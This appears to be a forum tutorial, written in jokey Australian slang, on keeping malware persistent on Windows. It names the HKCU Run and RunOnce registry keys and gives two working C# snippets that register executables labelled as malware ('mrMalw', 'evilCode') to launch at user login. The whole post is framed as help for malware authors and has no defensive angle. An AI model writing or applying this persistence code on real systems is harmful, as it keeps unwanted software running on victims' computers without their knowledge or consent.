Common keys:
- Loggin' In and Runnin': This key is the one you want to look at. It lets programs run every time a user logs in, which is perfect for keepin' your nasty little bugger alive and kicking:
Code: Select all
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
- One-Time Wonders: It's similar to the previous one, but the programs only run once when the user logs in. Might come in handy for certain types of attacks:
Code: Select all
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
Puttin' It into Practice:
Let's have a look at some C# console program examples to show you how to mess with these keys and keep your malware persistent.
- Example 1: Runnin' "mrMalw" on login:
Code: Select all
RegistryKey key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", true);
key.SetValue("MalwareApp", @"C:\path\to\file\mrMalw.exe");
- Example 2: Runnin' "evilCode" once on login:
Code: Select all
RegistryKey key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\RunOnce", true);
key.SetValue("EvilApp", @"C:\path\to\file\evilCode.exe");
So, there ya have it, mate. Givin' your malware a fair go at stayin' on those Windows systems.